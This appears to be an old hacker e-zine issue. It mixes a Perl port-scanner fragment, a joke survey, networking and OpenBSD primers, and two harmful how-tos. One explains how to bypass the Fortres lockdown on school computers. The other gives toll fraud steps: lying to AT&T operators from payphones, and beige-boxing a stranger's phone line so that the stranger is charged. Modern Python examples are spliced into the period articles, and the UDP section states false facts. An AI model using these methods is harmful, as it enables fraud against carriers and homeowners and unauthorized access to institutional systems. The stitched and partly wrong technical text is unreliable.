my @lines = <INFO>;
#close file
close(INFO);

#check to see if ip is alive
#and port scan to see what services
#are on the alive ips

foreach my $line (@lines)
{
    chomp($line);                 # drop the newline, or we ping "1.2.3.4\n"
    next unless $line =~ /\S/;    # skip blank lines
    unless ($host->ping($line, 2)) {
        $mult->print("$line Not responding\n");
    } else {
        $mult->print("$line is alive\n");
        #now lets port scan the alive ip
        for (my $port = 1; $port <= 500; $port++) {
            # Timeout so a filtered port does not hang the whole scan
            my $sock = IO::Socket::INET->new(PeerAddr => $line,
                                             PeerPort => $port,
                                             Proto    => 'tcp',
                                             Timeout  => 2);
            if ($sock) {
                $mult->print("$line Connected on Port $port\n");
                close($sock);
            } else {
                #if you uncomment the next line.. you will have a long long list
                #of unopened port prints
                #$mult->print("$port not open\n");
            }
        }
    }
}
$host->close();
# close the multi object (stdout and the alive.#file), not the file name
$mult->close();
exit();

There you go.. this little simple script will open a file, ping each ip in that
file, then if the ip is alive it will portscan it to see what services are
there, and print everything to an alive file and to stdout. I hope you
find it useful and helpful. enjoy...!!!

My next script will be a Perl/Tk variant of the one above. Maybe a few other
things as well. I also will be writing a few C programs, Tcl/Tk, vrml.
Who knows.. :-)


[Legions Survey]============================================[Gridmark/Phriction]

/* Editors Note: In spirit of such cool mags as Playboy or Cosmo, we have
decided to include a short survey of our readers. Feel free to cut and paste it,
fill out your answers and send it back to submit@legions.org... This should be
mighty interesting...
*/

Legions of the Underground member/regular/luser survey.

Legions Survey made possible because WGMATATS
Tip: if you don't answer all the questions you will be savagely beaten to a
bloody pulp by Gridmark and Phriction.

Thank you and Enjoy!


1. Do you know what WGMATATS stands for?


2. What is your favorite unsigned long int?


3. What is your handle?(alias,nickname,AKA)


4. What is the origin of your handle?(where did you get it from)


5. Who in legions do you think is the most likely to get arrested and for
what?


6. BeOS or MacOS?


7. touch or finger?


8. telnet or ssh?


9. Do most of the people you know refer to you by your handle?


10. What is your favorite protocol?


12. Favorite Daemon?


13. Usual bathroom reading?


14. Have you ever had sex with someone who could code Hello world in
assembly language?


15. Binary?


16. Do you own a pair of keys to a local ATM machine?


17. Do you know what a scenewhore is?


18. Are you one?


19. What must someone do to be elite?


20. Have you ever tried to nuke someone?


21. Do you have a root dance?



22. Have you ever owned a box stoned? or drunk?


23. Have you ever wrote root@127.0.0.1 as your address on a job application?


24. Have you ever rooted yourself?


25. Favorite book?


26. Favorite Car?


27. Favorite color?


28. Do you look at mullet porn?


29. Mountain Dew || Coffee?


30.

Multiple Choice Section

Just fill in the _'s with x's if you dont get it you suck.

Do you think this Survey is a threat to your security?
_[3y3 pj33r] _[no... dumbass]

Do you take large amounts of caffeine and then lie about it the next day?
_[Admitted Addict.] _[no, and im stickin to it]

Do you have a 1Mbit+ connection running to your house?
_[yep] _[nein]

Do you have more than 10 computers in any one room of your house?
_[si] _[no]

Do you run around your house with a lampshade on your head sayin
"Hi! ima squid!"? _[yay] _[nay]

What are your "m4d sk1llz y0h"?
_[i r00t stuff] _[skript kid] _[clubie crackhead fucknut] _[whats a computer?]

What is your current rate of income?
_[Under 10,000] _[11,000+] _[50,000+]
_[100,000+] _[31,337] _[None of your fucking business Gridmark.]

How much time do you "use" playing games?
__[hrs]

Do you use 31337'isms?
_[y34 b1z47ch] _[No sir]

Do you have MtDew cans flying at your head blindingly fast? (i.e. commercial)
_[WATCH OUT!] _[whatchu talkin bout willis?]

Do you like me? _[i lub j00] _[fsck you bitch]

Are you a chick? _[yea baby] _[3y3 41nt gn0 ch1x0r]
*//////////////*

*/ Sorry, /*
How much do you like me? _[this is] _[getting tedious]
*/ I'm Lonely /*

*//////////////*
if [$lastquestion == yes]; then "can i r00t you?" _[no way in hell Gridmark.]
/* I'm Lonely /*

Sexiest stooge? Larry or Moe? _[larry] _[moe] _[shemp] _[nuyk nuyk]

Are you bored yet _[zzzzz] _[CMON MAN KEEP GOING]

Who selected the second answer to the last question? _[not me] _[not me]

EOF


[Guide to 0wning Your School]=========================================[Gridmark]

Homework, a Guide to 0wning your school

Chapter 1.

This text is for the kiddies, may god have mercy on your souls.

If you're a CISCO router tech, then this is trivial bullshit.
But if you grew up like me, got a Tandy for your birthday 8 years ago and have
been hooked since, one that has used AOL and the like, one who thought
winnuke was cool at a time. But I have grown. I now know the wrongs I have
done. I now dedicate myself to the flow of information, for freedom and
truth against all forms of opposition. But it doesn't change the fact that
I'm a lazy sonofabitch.

Well, it's September, the leaves are turning a nice orange/brown, and school
is in session. If you go to school, you should have computers in class,
and they like to restrict your use of a computer. Like maybe web
filtering software. No mp3's for you, music disrupts the classroom.
And of course no pron when the teacher isn't looking, damn. Well, what are you
going to do about it? What about your access to local programs? No
solitaire when you're done with your work. No loading Quake III Arena and
fragging the shit outta Mike 3 classrooms away. Well, this is a 4/5
part series on how to overcome these hurdles and do the unthinkable:
0wn your school.

Fortres x.x hole

A lot of the schools around here use Compaqs, Gateways, HPs, or Dells. Now
each of these PCs is out of the box a wonderful machine, but then the idiot
sysadmin goes and installs a lockdown program by hand, and now your
perfect box is trash; you can maybe do one or two things on this box now.
One such program is Fortres. Fortres is relatively easy to break.

Bootdisk.

Get a bootdisk from your box, make sure it's clean. Throw it in the target box,
unplug it if necessary (but a reboot will do just fine). Boot the shit up
and delete the Fortres directory. (Btw, attrib -h *.* will help you find the
directory, it's usually hidden.) Reboot again and
you're home free!

IE


Shitty old IE, what's it good for? Breaking Fortres! If you can load up IE,
then instead of surfing over to slashdot type C:\ in the URL bar. Look at that,
the previously inaccessible directory listing, with full read/write! Well, the
first thing you would do is go to Tools > Folder Options > View > Hidden
files and folders > Show hidden files and folders. There you see the Fortres
directory. Wait, you can't delete it; you must rename it. Easy shit. Reboot.
(Hammers work nicely for reboots.) Lookie! No Fortres!

Right Click

It has come to my knowledge that by right clicking everything and executing
commands on icons etc. you can access and rename the fgc folder and gain
full access. I have not tested this method but it should work; they are
pretty dumb.

Thats it for now kids, stay tuned to Keen Veracity for more chapters!


[OpenBSD Security Overview]=========================================[David Jorm]

OpenBSD is often noted for its code auditing and integrated crypto, but the
security features go far beyond this. OpenBSD was built from the ground up
on the model of being a fabric woven with security in mind, not a
patchwork of bug fixes and security updates. This has led to OpenBSD
finally becoming recognised today for what it is: the most secure
operating system on earth. This article aims to illustrate these features
and provide practical examples of their application on production
machines.

Encryption:

One of the most astounding things about the information superhighway is the
number of people driving down it with their doors unlocked. Users and even
administrators still commonly employ systems where sensitive information
such as financial records and personal details are thrown over public
networks as clear text. This is largely due to the proliferation of
cleartext protocols such as telnet, rlogin and http. OpenBSD solves these
issues by including encrypted replacements by default; OpenSSH and https
(OpenSSL) respectively. One of the first configuration tasks for an
OpenBSD administrator should be the correct setup of ssh and ssl to ensure
system security. OpenSSH is configured via two primary configuration files;
some useful examples follow:

/etc/ssh_config (OpenSSH client configuration):

UseRsh no
FallBackToRsh no # OpenSSH will never fall back to the cleartext RSH protocol.
ForwardX11 no # Do not allow X windows forwarding through the SSH session.

/etc/sshd_config (OpenSSH server configuration):

Port 22
ListenAddress 0.0.0.0 # Listen on all active interfaces
HostKey /etc/ssh_host_key # Store the key in the default location
ServerKeyBits 1664 # Generate a 1664 bit key (stronger crypto than by default)
LoginGraceTime 600 # Allow 600 seconds for a client to login
KeyRegenerationInterval 3600 # Generate a new key every 3600 seconds (hourly)
PermitRootLogin no # Do not allow clients to login directly as root, must use su
X11Forwarding no # Do not allow X windows forwarding through the SSH session.
PermitEmptyPasswords no # A password MUST be issued - no passwordless logins allowed.
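As an added example (not part of the article), a small Python checker that reads an sshd_config in the form shown above and reports the options that are missing or weaker than the article's recommendation; the expected values are the article's, and both sample configurations are constructed. The inline "# ..." annotations in the listing are not sshd syntax (sshd refuses a line with trailing text after the value), so the checker strips them; in a real file they belong on their own lines.

```python
"""Audit an OpenSSH sshd_config against the settings recommended above.

Added example, not part of the article.  The expected values mirror the
article's server listing; both sample configurations are constructed.
"""
import re

# Option -> value the article recommends (sshd keywords are case-insensitive).
EXPECTED = {
    "permitrootlogin": "no",
    "permitemptypasswords": "no",
    "x11forwarding": "no",
}

# The article's listing, annotations included, as the hardened sample.
HARDENED_CONFIG = """\
Port 22
ListenAddress 0.0.0.0 # Listen on all active interfaces
HostKey /etc/ssh_host_key # Store the key in the default location
ServerKeyBits 1664 # Generate a 1664 bit key
LoginGraceTime 600 # Allow 600 seconds for a client to login
KeyRegenerationInterval 3600 # Generate a new key every 3600 seconds
PermitRootLogin no # Do not allow clients to login directly as root
X11Forwarding no # Do not allow X windows forwarding
PermitEmptyPasswords no # A password MUST be issued
"""

# A constructed weak counterpart: root login and X11 forwarding enabled,
# PermitEmptyPasswords left unset so sshd's built-in default applies.
WEAK_CONFIG = """\
Port 22
PermitRootLogin yes
X11Forwarding yes
"""


def parse_sshd_config(text):
    """Return {keyword_lowercase: value}.

    sshd uses the first occurrence of each keyword, so later duplicates are
    ignored here too.  Keyword and value may be separated by whitespace or
    by a single '='.  Anything after '#' is dropped: the article annotates
    lines that way, but sshd treats text after the value as garbage, so
    real comments belong on their own line.
    """
    options = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = re.split(r"\s*=\s*|\s+", line, maxsplit=1)
        if len(parts) != 2:
            continue
        key, value = parts[0].lower(), parts[1].strip()
        options.setdefault(key, value)
    return options


def audit_sshd_config(text):
    """Return one finding per option that is missing or weaker than expected."""
    options = parse_sshd_config(text)
    findings = []
    for key in sorted(EXPECTED):
        if key not in options:
            findings.append("%s: not set, sshd default applies" % key)
        elif options[key].lower() != EXPECTED[key]:
            findings.append("%s: is '%s', expected '%s'"
                            % (key, options[key], EXPECTED[key]))
    return findings


if __name__ == "__main__":
    for name, cfg in (("hardened", HARDENED_CONFIG), ("weak", WEAK_CONFIG)):
        print("%s: %s" % (name, audit_sshd_config(cfg) or ["OK"]))
```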


With SSH configured using these or similar options, the next step in enabling
OpenBSD crypto is to set up OpenSSL-based https. This is a good replacement
for cleartext http when sensitive information is being passed through CGI
POSTs or similar methods. The official documentation for mod_ssl (located
by default in /var/www/htdocs/manual/mod/mod_ssl/ on OpenBSD
systems) provides more detailed configuration information, but the
process is three relatively simple steps:


1. Generate a server key and self-signed x.509 certificate:

Generate a server.key:
$ openssl genrsa -des3 -out server.key 1024
Place this file in /etc/ssl

Generate a CSR (Certificate Signing Request):
$ openssl req -new -key server.key -out server.csr
Place this file in /etc/ssl

Generate an RSA key for your CA (Certificate Authority):
$ openssl genrsa -des3 -out ca.key 1024
Place this file in /etc/ssl

Generate an x.509 certificate for your CA:
$ openssl req -new -x509 -days 365 -key ca.key -out ca.crt
Place this file in /etc/ssl

Sign your CSR:
$ ./sign.sh server.crt
sign.sh comes packaged with the OpenSSL source distribution.

2. Edit /var/www/httpd.conf:

In the main section:
<IfDefine SSL>
Listen 80
Listen 443
</IfDefine>

<IfDefine SSL>
AddType application/x-x509-ca-cert .crt
AddType application/x-pkcs7-crl .crl
</IfDefine>

A <VirtualHost> tag for your domain:
<VirtualHost _default_:443>
# General setup for the virtual host
DocumentRoot /home/www/vhost/www.mydomain.net/htdocs
ServerName www.mydomain.net
ServerAdmin admin@mydomain.net
ErrorLog logs/error_log
TransferLog logs/access_log

# SSL Engine Switch:
# Enable/Disable SSL for this virtual host.
SSLEngine on

SSLCertificateFile /etc/ssl/server.crt
SSLCertificateKeyFile /etc/ssl/server.key
</VirtualHost>

3. Edit /etc/rc.conf to enable https:

httpd_flags="-DSSL"

Code Auditing:

One of the largest problems with systems such as Linux and FreeBSD is the
inclusion of unchecked third party software. If a vulnerability or
security issue arises, the third party must release a patch and the
operating system vendor must then redistribute this patch to their
users. Not only this, but the third party software used is not in any
way audited or checked for quality by the operating system vendors and as such
can be vulnerable for a long time before any sort of fix is available to
users (as happened numerous times with wu-ftpd). One of the major steps
forward for OpenBSD was when the entire source tree was audited for buffer
overflows and vulnerabilities. This has been constantly maintained and has
resulted in a product unparalleled in terms of security and system
integrity. In saying this, third party software is usually necessary for
the operation of a functional system, so OpenBSD makes it available
via the ports tree; a mechanism for downloading, installing and configuring
third party software known to work under OpenBSD, or modified to do so. I
won't go into details here of configuring the ports tree - this has been
broadly documented elsewhere.

Security Updates:

As opposed to the majority of commercial vendors and even some other open
source projects, OpenBSD takes a 'full disclosure' approach to any bugs or
vulnerabilities found in the source tree. This means that bugs are
reported immediately to users in their entirety, generally with a patch or
workaround included. The outcome of this is a system with no hidden bugs
or 'features' shielded from the users, a prime example of this being the
recent +.htr bug in Microsoft IIS. Users wishing to monitor security updates
as they occur can subscribe to the security-announce mailing list, or
monitor the patches posted to the OpenBSD errata page. The patches
provided are generally a source tarball, which can be simply installed
over the top of an existing system. An example of this is the installation
of the recent ftpd remote-root exploit patch:

1. Download the patch:
# wget ftp://ftp.openbsd.org/pub/OpenBSD/patches/2.7/common/019_ftpd.patch

2. Place the patch in your source root directory (/usr/src):
# mv 019_ftpd.patch /usr/src

3. Apply the patch to the source tree:
# patch -p0 < 019_ftpd.patch

4. Recompile ftpd:
# cd libexec/ftpd
# make obj && make depend && make && make install

5. Restart ftpd (which in this case has been started from inetd):
# ps aux | grep inetd
root 19983 0.0 0.4 72 264 ?? Ss 29May00 3:03.68 inetd
# kill -1 19983

As has been demonstrated, OpenBSD's "Secure by default" slogan holds merit in
all aspects of the system. Hopefully other open source projects (or dare I
suggest it, commercial vendors) will start to take on board this holistic
security approach to their own systems. Next week's article, which is the
final in the OpenBSD Explained Networking series, will look at the future
of OpenBSD Networking, examining developments such as ipv6 support, as
well as other possibilities for future releases.



[Air Gapped Networks]===================================================[dayzee]

Security standards often demand that a system be disconnected from all networks
before it can be given the highest security rating. Such pessimism seems
justified by the latest information security headlines; viruses, worms,
exploited vulnerabilities, denial-of-service attacks and Web site vandalisms
have left the impression that a connected machine is a vulnerable machine.
Unfortunately, cutting the connection ruins the quick and easy access between
back-office data systems and the world outside the trusted perimeter. For example,
your typical e-commerce architecture includes client authentication,
inventory tracking and valuable credit card information, all of which must be
accessed by "the outside world" to complete a transaction.

Currently there are three main categories of gap technologies:

Real-Time Switch
================

In a real-time switch setup, two networks are physically disconnected but can
share data as if they were connected. This seems like a contradiction, but
by adding a gap device that sends information back and forth between the two
networks it's very realistic. In this example, the gap device is a hardware
switch that can be physically connected to only one of the networks at a time.
In other words, the switch connects to one network, receives the data, switches
to the other network and sends the information onto it. This happens at
very high speeds, allowing for real-time operation.

----------------------------
| Untrusted Network |
----------------------------
|
------------
| Firewall | --------------------
------------ | Trusted Networks |
| --------------------
--------- |
| Switch |============
---------

One of the problems surrounding real-time switch networks is that a hardware
switch by itself is not enough, since attacks could still be carried into the
secure network and vital information carried out to the untrusted network.
Because the switch passes only "raw" data with the protocol headers stripped,
it prevents the risk of exploitation based on the network protocol's weaknesses.

A real-time switch is physically connected to only one network at a time.
After data is received from the untrusted network to the switch, the
network connection is terminated and the TCP header information
is stripped out. Then, the "raw" data is sent to the trusted network.



One-Way Link
============

With a one-way link, data is sent in one direction only, from the source to
the destination network. This creates a read-only network connection.

This one is pretty much self-explanatory. It creates essentially a "read-only"
network connection, which doesn't allow data to be sent back to the trusted
network. As in the real-time setup, the one-way link also is implemented
with hardware that prevents data from going the wrong way. This one seems
more practical for sending data to web servers or online orders, helping
prevent vital information getting out.

--------------------- ---------- -----------------------
| Source Network |========| Switch |=========| Destination Network |
--------------------- ---------- -----------------------

Network Switcher
================

A network switcher card has dual interfaces connected to separate networks,
only one of which is active at any given time. All system resources are
segmented between the two interfaces, with none shared.

A network switcher is simply an implementation of a card with dual interfaces.
Each interface is connected to a different network with only one active at
a time. A correct implementation will segment all system resources, assigning
some to each interface, with none belonging to both. Doing this, storage that
is assigned to one network is never accessible to the other, meaning none
of the information can be shared or viewed by the other network.

There are a few products using this type of gap technology: e-Gap from Whale
Communications (www.whalecommunications.com) and AirGap from Spearhead
Technologies (www.spearheadtechnologies.com). Each company's product is a
different solution with its own technology, which you can read more about at
their websites.


-------------- -------------
| Network 1 | | Network 2 |
-------------- -------------
| ===Single Physical System== |
=========== | ------------------ |============|
| | dual interface | |
| | card | |
| ------------------ |
| ------------------- |
| | virtual|| virtual| |
| | system || system | |
| | 1 || 2 | |
| -------------------- |
============================


Sept 6, 2000, dayzee@madsekci.net


[TKblink]==============================================================[clocker]

#!/usr/bin/wish

# list of colors to use.
set colorlist "red blue green yellow white black cyan magenta brown turquoise
lightcyan lightblue darkblue darkcyan purple orange"

# number of columns.
set col 10

# number of rows.
set row 10

# number of milliseconds between light changes.
set secsChange 125

# --- DON'T PLAY AROUND AFTER THIS LINE. --- #

# Set the window title.
wm title . TkBlinkenLights

# Set the current column and row to render
set cntCol 1
set cntRow 1

# dynamically create the grid of lights.

# start the loop for rows
while {$row >= $cntRow} {
# create a frame for the row
frame .f${cntRow}
# render the frame for the row
pack .f${cntRow}
# start a loop for the buttons
while {$col >= $cntCol} {
# create the current button
button .f${cntRow}.b${cntCol}
# render the current button
pack .f${cntRow}.b${cntCol} -side left -in .f${cntRow}
incr cntCol
}
set cntCol 1
incr cntRow
}

# draw exit button.
frame .exit
pack .exit
button .exit.b1 -text exit
pack .exit.b1 -side left -in .exit

# bind exit button.
set exit 0
.exit.b1 configure -command "exit"

# Start changing colors.
# Don't worry about the infinite loop, that's what the "exit" button is there
# for.

proc doColorChange {} {
global col row secsChange

set randCol 0
set randRow 0

# get random numbers for the column and row to change
while {$randCol == 0} { set randCol [expr round(rand() * 1000000) % $col + 1] }
while {$randRow == 0} { set randRow [expr round(rand() * 1000000) % $row + 1] }

# change the color
.f${randRow}.b${randCol} configure -background [randcolor]
.f${randRow}.b${randCol} configure -activebackground [randcolor]

# after a specific amount of time, start this process again
after $secsChange {doColorChange}
}

# process to get a random color
proc randcolor {} {
global colorlist
return [lindex $colorlist [expr round(rand() * 1000000) % [llength $colorlist]]]
}

# start changing the colors, beeotch!
doColorChange

# Oh yeah, and uh, i guess this code is under the GNU GPL.
# Don't like it? Fuck you, because i don't give a shit about you. Ungrateful
# bastard.


[TCP/UDP]===============================================================[dayzee]

TCP (Transmission Control Protocol) and UDP (User Datagram Protocol).
=====================================================================


Ports
=====

What is a port? A TCP or UDP port is what an internet server uses to
distinguish between requests for different services. For
example, telnet runs on port 23, while a web server listens on TCP port 80.
Here are some services and the ports they run on, you can also look on
your computer in /etc/services:


echo 7/tcp Echo
systat 11/tcp Users
ftp-data 20/tcp File Transfer [Default Data]
ftp-data 20/udp File Transfer [Default Data]
ssh 22/tcp secure shell
ssh 22/udp secure shell
telnet 23/tcp Telnet
telnet 23/udp Telnet
smtp 25/tcp Simple Mail Transfer
smtp 25/udp Simple Mail Transfer
nameserver 42/tcp Host Name Server
nameserver 42/udp Host Name Server
finger 79/tcp Finger
finger 79/udp Finger
www-http 80/tcp World Wide Web HTTP
www-http 80/udp World Wide Web HTTP
kerberos 88/tcp Kerberos
kerberos 88/udp Kerberos
hostname 101/tcp NIC Host Name Server
hostname 101/udp NIC Host Name Server
pop3 110/tcp Post Office Protocol - Version 3
pop3 110/udp Post Office Protocol - Version 3
auth 113/tcp Authentication Service
auth 113/udp Authentication Service
imap2 143/tcp Interim Mail Access Protocol v2
imap2 143/udp Interim Mail Access Protocol v2
syslog 514/udp System Log
route 520/udp Router Routed
whoami 565/udp whoami

TCP
===

TCP (RFC 793) (Transmission Control Protocol) is a communication method
(protocol) used along with the Internet Protocol (IP) to send data in the
form of packets from computer to computer over an internet connection. While
the Internet Protocol takes care of handling the actual sending of the data,
TCP takes care of keeping track of each packet that a message is divided
into for efficient routing through the internet. For example, when you
download a kernel, the TCP layer of the host divides the kernel into one or
more packets, numbers the packets, and forwards them to the client.
Although each packet has the same destination IP address, it may get
routed differently through the network. At the other end, the TCP layer
reassembles the packets and waits until they all arrive to forward them to
you as a single file.


TCP is known as a connection-oriented protocol, which means the
connection is established and will stay connected until all the packets
have been sent and received. TCP is responsible for making sure a file is
divided into the packets that IP sends, and for reassembling the packets into
the actual file that was downloaded at the other end. In the OSI model,
TCP is in layer four, also known as the transport layer.

TCP Header

|-------------------------------|---------------------------|
| source port | destination port |
|-------------------------------|---------------------------|
| sequence number |
|-----------------------------------------------------------|
| acknowledgement number |
|-----------------------------------------------------------|
| data offset| reserved | flags | window |
|-----------------------------------------------------------|
| checksum | urgent pointer |
|-----------------------------------------------------------|
| options (+ padding) |
|-----------------------------------------------------------|
| data (variable) |
|-----------------------------------------------------------|


UDP
===

UDP (RFC 768) is a communications method (protocol) that offers a limited
amount of service when messages are exchanged between computers in a
network that uses the internet protocol. UDP is an alternative to the
transmission control protocol (TCP) and, together with IP, is sometimes
referred to as UDP/IP. Like TCP, UDP uses the internet protocol to send a
datagram from one computer to another. Unlike TCP, UDP does not divide a
message into packets and reassemble them at the other end.
So, when a datagram is sent using UDP, it must arrive at the
other computer in full and in the same order it was sent. Network
applications that want to save processing time because they have very
small data units to exchange may prefer UDP to TCP.

UDP provides two services not provided by the IP layer. It provides port
numbers to help distinguish different user requests and, optionally, a
checksum capability to verify that the data arrived intact. In the OSI
model, UDP, like TCP, is in layer four, the transport layer.

UDP Header
<-------------------------32 bits---------------------->
|------------------------------------------------------|
| Source Port | Destination Port |
|-----------------------------|------------------------|
| Length | Checksum |
|------------------------------------------------------|
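As an added example (not part of the article), a Python decoder for the two header layouts above: it unpacks every field in the diagrams, names the TCP flag bits, uses the data offset to split options from payload, and rejects a UDP datagram whose Length field does not match the bytes present. Both sample packets are constructed by hand.

```python
"""Decode TCP and UDP headers laid out as in the diagrams above.

Added example, not part of the article.  Both sample packets are
constructed by hand (a TCP SYN to port 80 and a small UDP datagram to
port 53); they were not captured from a network.
"""
import struct

# Flag bits in the low six bits of the offset/reserved/flags word (RFC 793),
# listed from bit 0 upward.
TCP_FLAG_NAMES = ("FIN", "SYN", "RST", "PSH", "ACK", "URG")

TCP_FIXED_LEN = 20
UDP_HEADER_LEN = 8


def decode_tcp_header(segment):
    """Return the fields of a TCP segment's header as a dict.

    Raises ValueError when the segment is shorter than the fixed header or
    the data offset points outside the buffer (a truncated or bogus header).
    """
    if len(segment) < TCP_FIXED_LEN:
        raise ValueError("TCP header needs at least %d bytes" % TCP_FIXED_LEN)
    (src, dst, seq, ack, off_flags, window,
     checksum, urgent) = struct.unpack("!HHIIHHHH", segment[:TCP_FIXED_LEN])
    header_len = (off_flags >> 12) * 4        # data offset is in 32-bit words
    if header_len < TCP_FIXED_LEN or header_len > len(segment):
        raise ValueError("bad TCP data offset: %d bytes" % header_len)
    flag_bits = off_flags & 0x3F
    flags = [name for bit, name in enumerate(TCP_FLAG_NAMES)
             if flag_bits & (1 << bit)]
    return {
        "src_port": src, "dst_port": dst,
        "seq": seq, "ack": ack,
        "header_len": header_len, "flags": flags,
        "window": window, "checksum": checksum, "urgent": urgent,
        "options": segment[TCP_FIXED_LEN:header_len],
        "payload": segment[header_len:],
    }


def decode_udp_header(datagram):
    """Return the fields of a UDP datagram's header as a dict.

    The Length field counts header plus data, so it must be at least 8 and
    must not exceed the bytes actually present; a checksum of 0 means the
    sender did not compute one (RFC 768).
    """
    if len(datagram) < UDP_HEADER_LEN:
        raise ValueError("UDP header needs at least %d bytes" % UDP_HEADER_LEN)
    src, dst, length, checksum = struct.unpack("!HHHH", datagram[:UDP_HEADER_LEN])
    if length < UDP_HEADER_LEN or length > len(datagram):
        raise ValueError("bad UDP length field: %d" % length)
    return {
        "src_port": src, "dst_port": dst, "length": length,
        "checksum": checksum, "checksum_present": checksum != 0,
        "payload": datagram[UDP_HEADER_LEN:length],
    }


# Constructed TCP SYN: ephemeral port 40000 -> 80, data offset 6 words
# (24 bytes: fixed header plus a 4-byte MSS option), SYN flag only.
SAMPLE_TCP_SYN = (struct.pack("!HHIIHHHH", 40000, 80, 0x11223344, 0,
                              (6 << 12) | 0x02, 65535, 0x1234, 0)
                  + b"\x02\x04\x05\xb4")

# Constructed UDP datagram: port 40001 -> 53, 4 bytes of payload, no checksum.
SAMPLE_UDP = struct.pack("!HHHH", 40001, 53, 12, 0) + b"\xde\xad\xbe\xef"


if __name__ == "__main__":
    print(decode_tcp_header(SAMPLE_TCP_SYN))
    print(decode_udp_header(SAMPLE_UDP))
```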



dayzee - dayzee@stupidphat.com, October 1999


[Teleconferencing]=======================================================[Vixen]

Let me start this off by saying, half of you probably already know how to do
this. I am writing this only because people are still asking all the time
how to set up teleconferences, or they say that they won't set one up
because "they don't know how". I know I could easily refer them to the
SysFail article about this, but for some reason that never seems to
work. People just keep bugging me about it. So, in this article I will go
over two ways of starting a teleconference.

METHOD ONE: Your Friendly Neighborhood COCOT. First, find a COCOT
Payphone. COCOT stands for Customer Owned Coin Operated Telephone. What the
hell does that mean? Well, it means that it's a payphone that is owned or
rented by some customer of the telephone company. It won't have a Bell or
GTE logo on it or anything.

The telephone line is a normal customer loop, instead of a special payphone
loop that normal payphones are on that allow certain tones to go through
when you put in your change (yeah, the red box tones). So you won't be
able to get free calls by redboxing this thing, but there are still ways
to fuck with it.....

Now, go find one. Good, now that you've found one, dial 1-800-232-1234. An
operator will pick up and you should have a conversation similar to this
(note: individual conversations may vary):

OPER: AT&T Teleconferencing, may I help you?
YOU: Can you setup a teleconference for me?
OPER: Yes, have you ever used the service before?
YOU: No, you stupid bitch, I haven't.
OPER: Okay, can I get your name?
YOU: Yes, *name goes here*, and I'm with *random company*.
OPER: Okay, let me setup a folder for you.... Okay your folder ID is xxxxx,
now, can I have the name and number of all the participants?
YOU: No, fucking whore, I want a dial-in.
OPER: Okay, how many participants [OR:] how many ports? [both are the same]
YOU: 15
OPER: Would you like that to auto-extend?
YOU: Sure, that would be swell!
OPER: When do you want this for?
YOU: *anytime you want the conf up*
OPER: Today?
YOU: Yes, fucking moron!
OPER: Duration?
YOU: 3 hours, wait - no, no, 3 and a half hours!
OPER: Can I have the number to your location?
YOU: [give her the number of the COCOT payphone you are at]
OPER: Alright, I'll call you back with the host and participant pins
YOU: Gee-golly! that's great!


At this point you will both hang up and you will snicker about the whole
episode. But you're not done yet.... wait about 5 minutes....

Ring Ring Ring..... Ring Ring Ring, etc....

YOU: *random company you chose* this is *name you chose* how may I help you?
OPER: Hello, Sarah with AT&T Teleconferencing
YOU: It's about fucking time!
OPER: Your 888 number is 888-422-7128. Your host pin is 738846. Your guest
pin is 539427
YOU: Alright, let me verify those numbers. 800-422-7128. Host 738846 and
user 539427?
OPER: Yes, have a nice day. Thank you for using AT&T

You both hang up, and you go tell all your IRC friends about the conf. Good
thing you wrote that 888 number and those pin numbers down! Oh... you
didn't? Erm.... you better go back to that COCOT and repeat all of
this. Just remember to write everything down this time. By the way, the
reason you say you are from a business is because COCOTs
are on a business line, and the operator thinks you are calling from a
business.

METHOD TWO: Beige Boxing Your Way To Fame

First, get a notepad and a pen. Now get your beige box. Now get an ANI
number. Getting an ANI number is very important. Test the ANI number
before you go. Now, find a house to beige box. Call the ANI number and
write down the number of the house. Now, call 1-800-232-1234 and have the
same conversation you would have if you were using method one, EXCEPT,
don't pretend to be a business. When the operator asks for
the number you are calling from, give them the number of the house (that is
what the ANI thing was about. See? It _was_ important!). Just be a normal
person like you are calling from your own house. Now, when AT&T calls you
back, write down the info and go home.

Remember (for BOTH methods):
Set up the teleconference to run PAST 12:30 AM! This way, even if you say
you want the conference to end at 1:30 AM, it will automatically go on
until 7:00 AM.

IMPORTANT:
Do _NOT_ use the Host pin from your house! They might back charge you for



[TCP IP Datagrams Explained]============================================[vortek]

Greetings Impiety
"... of Belial, the wicked one; children of darkness. be impious..."


I'm writing this article to clarify a few things. There is a problem
out there, and this problem is changing the undernet as we know it.
The problem: EXCESS LAMERS! Guys, we need to set some ethics, some
standards for these new scholars. That is why I'm writing this article.
There are too many stupid @ss9 dosers out there and script kiddies;
they don't even understand the protocol that they so much ride on,
let alone how the bloody h4x0r.c travels to its destination point. :D

This article will explain the IP datagram and all of its options; it will
also clarify how they affect the way your IP datagram travels. This article
will not be TOO advanced, but it will teach you enough to understand what's
going on.

Knowledge puffeth up, but charity edifieth. --1 Cor. viii. 1. "BIBLE!!"


OK, I'm gonna start out with the basic layout of an IP datagram.
Yes, I stole this leet ASCII art from an RFC; I didn't feel like playing ASCII
art kiddie to create it.

Example: the * marks bit 12. Read the digit in the first row as the tens
digit and the digit in the second row below it as the ones digit (1 over 2 = 12).
0 1 * 2 3
0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|Version| IHL |Type of Service| Total Length |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Identification |Flags| Fragment Offset |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Time to Live | Protocol | Header Checksum |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Source Address |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Destination Address |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Options | Padding |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

OK, an IP datagram header is made of 6 layers (rows), each 0 to 31 bits wide.
Each field tells us what version, what type, how to send, etc. We will start
with the first field of the first layer. This is called the Version field.
Since this packet is assumed to be sent on a standard network, we'll base this
